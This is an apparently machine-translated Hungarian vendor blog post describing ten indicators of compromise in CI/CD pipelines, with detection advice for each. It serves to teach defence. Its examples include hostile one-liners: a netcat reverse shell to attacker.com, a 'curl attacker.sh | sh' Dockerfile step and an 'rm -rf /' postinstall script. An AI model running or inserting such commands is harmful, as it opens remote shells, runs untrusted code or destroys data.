A kompromisszum 10 legfontosabb mutatója CI/CD Pipelines

Bevezetés: Mik a kiberbiztonsági kompromittálódás indikátorai?

A kompromittálódás jelzői az első figyelmeztető jelek, amelyek arra utalnak, hogy a rendszered vagy pipeline támadás alatt állhat. Egyszerűen fogalmazva, a kompromisszum mutatói a támadók által hagyott nyomok, mint furcsa logins, fájlmódosítások vagy rejtett rosszindulatú programok. NOB kiberbiztonság, úgy viselkednek, mint az ujjlenyomatok egy bűncselekmény helyszínén, egyértelmű bizonyítékot szolgáltatva arra, hogy valami nincs rendben. Ezért, amikor a fejlesztők megkérdezik Mik a kompromisszum jelei?, a válasz nem korlátozódik a szerverekre vagy a tűzfalakra, hanem magában foglalja a modern rendszerekben rejlő kockázatokat is CI/CD pipelines.

Ezekben pipelineA támadók észrevétlenül manipulálhatják a kódot, rosszindulatú függőségeket adhatnak hozzá, vagy megváltoztathatják a build lépéseit. A legtöbb útmutató azonban továbbra is csak a szerverekre vagy a hálózatokra összpontosít. Ennek eredményeként a szoftverellátási lánc az egyik legkönnyebben célponttá vált.

Ezért kell kompromisszumra utaló jeleket találni CI/CD pipelineelengedhetetlen. Mindenekelőtt segít a csapatoknak blokkolni a rosszindulatú programokat, megvédeni a titkokat és biztonságossá tenni a szoftverszállítás minden lépését.

A kompromisszum 10 legfontosabb mutatója CI/CD Pipelines

A kompromittálódás jelzéseinek magyarázatakor a legtöbb lista a szerverekre vagy a hálózatokra összpontosít. Mégis CI/CD pipelineA támadók nagyon eltérő ujjlenyomatokat hagynak maguk után. Ezen jelek felismerése kulcsfontosságú a proaktív védekezéshez. Az alábbiakban bemutatjuk a 10 IOC kiberbiztonsági vészjelzést, amelyre minden fejlesztőnek és biztonsági mérnöknek figyelnie kell.

1. Gyanús függőségi változások

A kompromisszum egyik fő mutatója pipelineAz s egy hirtelen, furcsa függőségi frissítés. A támadók gyakran használják ki a csomagkezelőkben elhelyezett bizalmi pontokat a fejlesztők számára, hogy veszélyes csomagokat adjanak hozzá.

Például npm-ben a package.json A különbség hirtelen a következőket foglalhatja magában:

Az ilyen változtatások biztonságosnak tűnhetnek, de trójai kódot juttathatnak minden buildbe.

Hatás: A feltört buildek a forrásuknál öröklik a kártevőket.

Érzékelés: függőségi felülvizsgálatok kikényszerítése, zárolási fájlok közötti különbségek nyomon követése és az új csomagok folyamatos ellenőrzése.

2. Obfuskált kód a buildekben 

A kártevők szerzői a ködösítésre támaszkodnak, hogy megkerüljék a véleményeket. Ennek eredményeként ez a kompromittálódás jele... CI/CD pipelineAz s fájlokat a legnehezebben lehet észrevenni. Valójában a obfuszkált hasznos adatok gyakran észrevétlenül becsúsznak nyílt forráskódú könyvtárakba vagy konténerképekbe.

Például:

  • Egy PyPI csomag, amely a következőt használja: base64.b64decode("cHJpbnQoSGFja2VkKQ==").
  • Egy Docker kép, tele nem szükséges UPX binárisokkal.
  • JavaScript tele van \x41\x42 megszökik a hitelesítő adatok ellopásának rejtekhelyéről.

Hatás: A rejtett kód csendben fut mind a build, mind a futásidő alatt, ami kritikus fontosságú az IOC kiberbiztonságában.
Érzékelés: Kombájn SAST a rosszindulatú programok szkennelésével a kódolt vagy csomagolt kód megjelölésére. Mindenekelőtt a ködösítést vészjelzésként kell kezelni, amely további vizsgálatot érdemel.

3. Gitben leleplezett titkok: Klasszikus IOC kiberbiztonsági kockázat

CI/CD pipelinegyakran közvetlenül a tárházakból öröklik a titkokat. Azonban amikor a titkok megjelennek a Gitben, ezek jelentik az egyik legtisztább választ arra a kérdésre, hogy „mik a kompromisszum jelei a pipeline„s?” Miután a hitelesítő adatok bekerülnek a Gitbe, a támadók korlátlanul kihasználhatják azokat.

Például:

  • A .env tartalmazó fájl AWS_SECRET_KEY=.
  • Tokenek betolva config.json.
  • A titkok eltávolítás után is láthatók a Git előzményeiben.

Hatás: A kiszivárgott kulcsok közvetlen hozzáférést biztosítanak a támadóknak CI/CD pipelines, felhőalapú rendszerek vagy adatbázisok. Ez tehát a kompromittálódás egyik legveszélyesebb mutatója.
Érzékelés: Felhasználás pre-commit hooks és CI-feladatokat titkos szkenneléshez, és azonnal vonja vissza a kiszivárgott kulcsokat. Ezenkívül érvényesítse az automatikus hibaelhárítást a kitettségi időablakok csökkentése érdekében.

4. Meghamisított Pipeline Konfigurációk: Rejtett kompromisszumjelzők

Pipeline a konfigurációk nagy értékű célpontok, mert egyetlen módosítás gyakran felborítja az egész munkafolyamatotKövetkezésképpen, manipulálták pipeline A fájlok jelentős NOB kiberbiztonsági kockázatot jelentenek, amelyet a hagyományos monitorozó eszközök ritkán észlelnek.

Például:

  • GitHub műveletek:

  • GitLabban: egy rosszindulatú feladatot adtak hozzá a .gitlab-ci.yml ami érzékeny adatokat dob ​​ki.
  • Jenkinsben: sh "nc -e /bin/bash attacker.com 4444".

Hatás: Ezek a nem jóváhagyott változtatások megváltoztatják az Ön pipeline egy állandó hátsó ajtóvá válik a támadók számára, ami egyértelműen a kompromittálás jelzőjének számít.
Érzékelés: Aláírt konfigurációk kikényszerítése, PR-jóváhagyások megkövetelése és váratlan feladatok figyelése. Ezenkívül állítsa be a következőket: guardrails amelyek automatikusan blokkolják a módosított munkafolyamatokat.

5. Kiváltságos IaC Alapértékek 

A rosszul konfigurált infrastruktúra-definíciók gyakran rejtett hátsó kapukat hoznak létre. Ennek eredményeként a privilegizált felhasználók alapértelmezetten... IaC klasszikus NOB kiberbiztonsági kockázatot jelentenek.

Például:

  • Kubernetes-telepítés podokat engedélyez privileged: true.
  • Helm térképei leleplezik a szolgáltatásokat 0.0.0.0:22.

Hatás: A támadók root szintű hozzáférést szereznek, vagy nyilvánosan elérhetővé teszik a belső szolgáltatásokat. Következésképpen ezek a problémák jelentősen kiterjesztik a támadási felületet.
Érzékelés: Jelentkezem IaC szkennelés a minimális jogosultságok érvényesítése érdekében az egyesítés előtt. Ezenkívül győződjön meg arról, hogy minden konfigurációt felülvizsgálnak a folyamat részeként. pipeline.

6. Szokatlan felépítési viselkedések 

A támadók gyakran változtatnak pipeline viselkedés rosszindulatú tevékenységeket hoz létre. Más szóval, a szokatlan építési tevékenység az egyik legtisztább válasz arra, hogy mik a behatolás jelei CI/CD pipelines.

Például:

  • Kimenő hálózati kéréseket küld furcsa domainekre.
  • Egy Node.js projekt hirtelen PowerShellt indít el a következő folyamat során: npm install.
  • Egy CI-feladat, amely nagyméretű bináris fájlokat tölt le, amelyek nincsenek definiálva a build szkriptekben.

Hatás: A feltört buildek rosszindulatú programok terjesztési pontjaiként működhetnek. Mindenekelőtt rosszindulatú csomagokat terjeszthetnek minden telepítésben.
Érzékelés: Figyelje a buildnaplókat váratlan folyamatok vagy kapcsolatok észlelése érdekében. Továbbá konfigurálja az anomáliadetektálást a normától eltérő viselkedések jelzésére.

7. Rosszindulatú csomagszkriptek, mint IOC kiberbiztonsági kockázatok

A csomagkezelők támogatják az életciklust hooks amelyeket a támadók kihasználnak. Ezért az npm, PyPI vagy Dockerfiles fájlokban található rosszindulatú szkriptek a behatolás egyértelmű jelei.

Például:

  • npm: postinstall szkript fut rm -rf / vagy jelzés egy C2-nek.
  • PyPI: setup.py rejtett Python kód végrehajtása telepítéskor.
  • Dockerfile: RUN curl attacker.sh | sh.

Hatás: A támadás a telepítés során, a futásidejű tesztelés előtt fut. Következésképpen a fejlesztők észre sem vehetik, amíg túl késő nem lesz.
Érzékelés: Csomagjegyzékfájlok vizsgálata telepítési szkriptek után. Ezenkívül a kockázatos fájlok korlátozása. hooks in CI/CD munkahelyek az expozíció csökkentése érdekében.

8. A nyilvántartás-mérgezés veszélyének mutatói

A támadók lecserélik vagy módosítják a nyilvántartásokban található összetevőket, és ezek az események tankönyvi példái annak, hogy mik lehetnek az ellátási láncban a behatolás jelei. pipelines.

Például:

  • Egy Docker képcímke csendben frissült egy trójai fertőzött réteggel.
  • Egy belső csomagot egy mérgezett verzióval helyettesítettek.
  • npm névtérfoglalás, például lodash-proxy.

Hatás: Minden, a beállításjegyzékbeli összetevőt használó build veszélybe kerül. Ráadásul a veszély átterjed a későbbi szolgáltatásokra is.
Érzékelés: Aláírás- és integritásellenőrzések kikényszerítése minden beállításjegyzékbeli lekérésekor. Ezenkívül az összetevők eredetének nyomon követése a következővel: SBOM érvényesítés.

9. Anomális felhasználói aktivitás, mint IOC bizonyíték

A feltört beszámolók szinte mindig rendellenes nyomokat hagynak maguk után. Ennek megfelelően a szokatlan fejlesztői viselkedés a kompromittálódás erős mutatója.

Például:

  • Commithelyi idő szerint hajnali 3-kor tolták el.
  • PR jóváhagyások szabadságon lévő ügyfelektől.
  • Pipelineszokatlan gyakorisággal váltódik ki.

Hatás: A támadók ellopott hitelesítő adatokkal rosszindulatú módosításokat hajtanak végre. Végül is jogosulatlanul commitkönnyen beilleszthetők a szokásos munkafolyamatokba.
Érzékelés: monitor SCM anomáliákra vonatkozó tevékenység, MFA betartatása és a tokenek rendszeres cseréje. Ezenkívül riasztás gyanús esetekben commit vagy jóváhagyási minták.

10. Sikertelen integritás- vagy aláírás-ellenőrzések az IOC kiberbiztonságában

Gyakori, de figyelmen kívül hagyott kompromisszum jelzője egy sikertelen integritás- vagy aláírás-ellenőrzés. Az IOC kiberbiztonságában ezek az ellenőrzések ellenőrzik a kód vagy a műtermékek hitelességét. Kihagyásuk esetén pipelinekitéve.

Példák:

  • Az SHA256 hash nem egyezik a várt ellenőrzőösszeggel.
  • Hiányzó vagy érvénytelen GPG aláírás.
  • An SBOM aláíratlan tárgyakat mutatva.

Hatás: Az integritási hibák gyakran manipulációt, beállításjegyzék-mérgezést vagy kártevő-befecskendezést jelentenek.

Érzékelés: Automatizálja az aláírás-ellenőrzéseket, kényszerítse ki az ellenőrzőösszeg-érvényesítést, és blokkolja az aláíratlan komponenseket. Mindenekelőtt minden sikertelen ellenőrzést a kompromittálódás egyértelmű bizonyítékaként kezeljen.

CI/CD A kompromisszum jelzői egy pillantásra

Kompromisszumjelző (IOC) Behatás CI/CD Pipelines Hogyan lehet felismerni
Gyanús függőségi változások A támadók rosszindulatú könyvtárakat juttatnak a csomagkezelőkbe, ami feltört buildekhez vezet. Zárolási fájlok közötti különbségek nyomon követése, függőségi felülvizsgálatok kikényszerítése és a függőségek folyamatos vizsgálata.
Obfuscált kód a buildekben A rejtett hasznos adatok észlelés nélkül végrehajtódnak a buildek vagy futásidejű környezetben. Felhasználás SAST és a kártevő-szkennelés a base64, hex vagy csomagolt kódminták megjelölésére.
Gitben leleplezett titkok A kiszivárgott tokenek vagy API-kulcsok közvetlen hozzáférést biztosítanak a támadóknak a kritikus rendszerekhez. Titkos szkennelések futtatása Gitben hooks és automatikusan visszavonja a kiszivárgott hitelesítő adatokat.
Meghamisított Pipeline Konfigurációk A módosított munkafolyamatok lehetővé teszik az adatok kiszűrését vagy megőrzését a rendszeren belül CI/CD. PR-jóváhagyások megkövetelése, aláírt konfigurációk kikényszerítése és monitorozás pipeline változtatások.
Kiváltságos IaC Alapértékek A túlságosan engedékeny szerepkörök vagy a nem biztonságos alapértelmezett beállítások veszélyeztetik a felhőalapú környezeteket. Terraform, Kubernetes és Helm fájlok vizsgálata a minimális jogosultságok érvényesítése érdekében.
Szokatlan felépítési viselkedések Pipelinekártevő-terjesztési pontként vagy oldalirányú mozgáshoz használják. Elemezze a buildnaplókat váratlan letöltések, folyamatok vagy kimenő hívások szempontjából.
Kártékony csomagszkriptek A rejtett telepítés előtti/utáni szkriptek a futásidejű tesztelés előtt indítják el a hasznos adatokat. Kockázatos npm/PyPI szkriptek blokkolása és végrehajtásának korlátozása CI/CD munkahelyeket.
Regisztrációs mérgezés A trójai eredetű műtermékek lecserélik a megbízható képeket vagy bináris fájlokat a beállításjegyzékekben. Ellenőrzőösszegek ellenőrzése, aláírás-érvényesítés kikényszerítése és a beállításjegyzékek proaktív vizsgálata.
Szokatlan felhasználói tevékenység A feltört fiókok rosszindulatú tartalmakat terjesztenek commits vagy ravasz pipelines. MFA kikényszerítése, monitorozás commitanomáliákat keresünk, és elemezzük login mintákat.
Sikertelen integritás- vagy aláírás-ellenőrzések Jelzi a manipulált kódot, függőségeket vagy képeket, amelyek bekerülnek a rendszerbe. pipeline. Automatizálja az integritásellenőrzéseket, és blokkolja az aláíratlan vagy egyező komponenseket.

Miért hiányzik a hagyományos NOB kiberbiztonság? CI/CD Kockázatok

A legtöbb szervezet már most is figyelemmel kíséri a szervereken, számítógépeken vagy hálózatokon bekövetkező kompromittálódás jelzőit. Az IOC kiberbiztonságának ez a klasszikus megközelítése azonban figyelmen kívül hagyja a következőket: CI/CD pipelines, amelyek most az egyik legkritikusabb támadási felületet jelentik. Valójában, pipelineegyedi kompromisszumos jeleket mutatnak, amelyeket a hagyományos eszközök nem tudnak észlelni.

A hagyományos biztonság kompromisszumának mutatói

A hagyományos NOB kiberbiztonságban a hangsúly általában a következőkön van:

  • Szokatlan loginolyan címek vagy IP-címek, amelyek ellopott hitelesítő adatokra utalnak.
  • Gyanús fájlkivonatok vagy beállításjegyzékbeli módosítások, amelyek rosszindulatú programokat tárnak fel.
  • Váratlan kimenő forgalom, amely adatelszivárgásra mutat.

Ezek jól ismert mutatók, amelyeket a ...-ban is nyomon követnek. MITER ATT&CK keretrendszer, amely feltérképezi a gyakori ellenséges viselkedéseket és taktikákat. Ezek hasznos jelek. Azonban főként operációs rendszerekre vagy vállalati hálózatokra vonatkoznak. Ennek eredményeként nem veszik észre a szoftverellátási lánc korábbi szakaszában bekövetkező finom manipulációt.

Miért CI/CD PipelineKülönbözőek

CI/CD pipelineolyan automatizált környezetek, ahol a fejlesztők commit kód, pull függőségek és release buildek. A támadók tudják, hogy egy kompromittálás itt minden telepítésre átterjed. Ennek megfelelően mik a kompromittálódás jelei a... CI/CD pipelineNagyon másképp néznek ki:

  • Egy rosszindulatú függőség csendben hozzáadva a package.json vagy a requirements.txt fájlhoz.
  • Gitben elérhető API-kulcsok vagy tokenek commits vagy .env fájlok.
  • Npm vagy PyPI csomagokba injektált obfuszkált kód.
  • Terraform vagy Kubernetes fájlok nem biztonságos alapértelmezett értékekkel, például privileged: true.
  • Pipeline adatok kiszivárogtatása vagy hátsó ajtók megnyitása céljából szerkesztett feladatok.

Ezek a kompromisszumos jelek CI/CD láthatatlan marad standard biztonsági eszközök.

A NOB kiberbiztonságának hiányosságai

Bár sok csapat tisztában van a behatolásjelzők értékével, továbbra is csak a szerverekről és a hálózati naplókból származó észlelésre hagyatkoznak. Ezért a támadók megmérgezhetik a buildeket vagy rosszindulatú programokat helyezhetnek be anélkül, hogy a szokásos nyomokat hagynák. Ez az oka annak, hogy az olyan incidensek, mint az XZ Utils hátsó ajtó vagy a rosszindulatú npm csomagok, észrevétlenek maradtak, amíg el nem érték az éles környezetet.

Az ilyen típusú ellátási láncbeli kompromisszumokat a következők is kiemelik: CISAz A ellátási lánc biztonságára vonatkozó útmutatója, amely arra figyelmeztet, hogy a támadók egyre inkább célpontokat találnak CI/CD pipelineés a nyilvántartások.

Az Elvihető

A NOB hagyományos kiberbiztonsága szükséges, de nem elég. Mindenekelőtt a csapatoknak fel kell ismerniük a kompromittálódás jeleit, amelyek az adott területre jellemzőek. CI/CD pipelineCsak ezután tudják észlelni a rosszindulatú kódot, vagy pipeline a bántalmazás, mielőtt az átterjedne a környezetre.

sca-tools-software-composition-elemző-eszközök
Szoftverkockázatok rangsorolása, elhárítása és biztosítása
Szerezd meg az ingyenes fiókodat.
Nem szükséges hitelkártya.

Biztosítsa szoftverfejlesztését és -szállítását

az Xygeni termékcsomaggal